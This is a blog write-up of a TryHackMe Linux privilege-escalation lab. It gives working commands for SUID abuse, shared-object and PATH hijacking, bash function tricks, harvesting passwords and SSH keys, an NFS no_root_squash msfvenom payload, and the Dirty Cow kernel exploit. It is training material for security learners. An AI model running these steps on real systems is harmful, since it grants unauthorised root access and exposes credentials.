TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)

5/5 - (2 votes)

CHALLENGE OVERVIEW

Watch this video on YouTube

CTF Creator: Tib3rius
Link: https://tryhackme.com/room/linuxprivesc
Difficulty: medium
Target: gaining root access using a variety of different techniques
Highlight: Rooting a Linux machine using the famous Dirty Cow Kernel Exploit.
Tags: privesc, linux, privilege escalation

BACKGROUND

Welcome back to part II of this Linux privilege escalation series. You can find part 1 of this mini-series here:

In this tutorial, we’ll try some additional “magical” methods of gaining root access in tasks 11-21. Buckle in, and let’s get to it!

TASK 11 – SUID/SGID Executables

After making sure that we have connected to the TryHackMe VPN with OpenVPN, let’s go ahead and search for all files that have a SUID or SGID bit:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Let’s check out the exim 4.84-3 on exploit-db.com to see if there are any known vulnerabilities. There is!

To make this faster, TryHackMe has already preloaded our machine with the exploit file. Let’s execute it and see if we can grab root!

TASK 12 – SUID / SGID Executables – Shared Object Injection

In this privesc method we will use strace to search for libraries with no such file error when running the suid-so binary.

The libcalc.so file should exist in the /home/user/.config/ directory, but it is apparently missing. Let’s compile the included c file into that location with the command:

gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c

Now when we run the suid-so binary it should spawn a root shell.

TASK 13 – SUID / SGID Executables – Environment Variables

We’ll run strings to see a little more about the inner workings of the suid-env file.

strings /usr/local/bin/suid-env

We can see that the final step in this program is to start an apache2 service. We can hijack this service by compiling a spoofed program with the same name that spawns a bash shell.

gcc -o service /home/user/tools/suid/service.c

Finally, we need to modify the PATH variable with our current directory prepended in order to allow our spoofed service file to run.

PATH=.:$PATH /usr/local/bin/suid-env

TASK 14 – SUID / SGID Executables – Abusing Shell Features (#1)

In this task, we will exploit the suid-env2 executable’s full path. In bash versions < 4.2-048 it is possible to create shell functions with filenames that appear to be full paths and also to export them to be used instead of the actual executables.

First, let’s check our bash version:

/bin/bash --version

And now, let’s create a Bash function with the name “/usr/sbin/service” that will spawn a new Bash shell with persistence mode turned on.

function /usr/sbin/service { /bin/bash -p; }

And last but not least, let’s export this new function and run the executable to get our root shell!

export -f /usr/sbin/service
/usr/local/bin/suid-env2

TASK 15 – SUID / SGID Executables – Abusing Shell Features (#2)

We’ll exploit another shell function that works on Bash versions 4.4 and above. This time we’ll exploit the debugging mode’s ability to spawn an extra prompt for debugging statements.

In the env command, we ask the debugging shell to run a command to copy /bin/bash to a new file /tmp/rootbash and to give that file +xs permissions to let us execute and become root on the new shell.

TASK 16 Passwords & Keys – History Files

This is my favorite method in this whole list because of the simplicity of the hack.

We scan all hidden bash history files and view them with less to search for passwords that may have been saved as plaintext. We find a MySQL password for root and can easily switch users to root.

TASK 17 Passwords & Keys – Config Files

In this task, we examine an ovpn file to see if there are any references to a file holding credentials. We find them without much trouble!

TASK 18 – Passwords & Keys – SSH Keys

In this task, I’ll identify and copy a hidden ssh key from the target machine.

Next, over on my Kali attackbox, we paste the contents into a new file and change permissions to 600 before SSHing our way into the target machine as root!

TASK 19 – NFS

In this task, we’ll exploit the network file system by mounting it to our attackbox and changing permissions. First, let’s cat out /etc/exports to see what is mountable and which permissions we might be able to exploit.

And here we see the infamous exploitable “no_root_squash”!

👉 Recommended: For further reading on exploiting the no_root_squash permissions on NFS, check out Hacking Network File System (NFS) – A TryHackMe Walkthrough

First, let’s create a new mount point at /tmp/mount on our attack machine.

mkdir /tmp/mount

Now let’s mount the NFS folder.

mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs

Let’s create a malicious payload with msfvenom and place it in the NFS directory.

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

Now let’s add SUID permissions so that we can spawn a root shell.

chmod +xs /tmp/nfs/shell.elf

The last step is to switch back to the target machine and run the elf file to gain a root shell.

/tmp/shell.elf

TASK 20 – Kernel Exploits

In the final task, we will find a known kernel exploit and run it to gain root access. Let’s start out by running the Linux exploit suggester 2 script to help us identify potential exploits.

We’ll move ahead with option 3, the dirty_cow exploit. Let’s compile it from the files already conveniently located on my machine.

gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w

And now we can run it and gain a root shell.

./c0w

TASK 21 – Privilege Escalation Scripts

The three scripts for Linux privesc located on this machine are:

LinEnum.sh
linpeas.sh
lse.sh

A full comparison of these scripts is out of the scope of this tutorial. If you’d like to see a detailed side-by-side analysis, please let me know, and I’ll add it to my list of future blog ideas.

FINAL THOUGHTS

Thanks for reading this write-up!

I’ve enjoyed trying out all of the different ways to privesc to root on Linux machines. It leaves me questioning my assumption that Linux machines are more secure than Windows or Mac machines.

It also reaffirms the importance of keeping operating systems up to date.

Benjamin Reitz

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.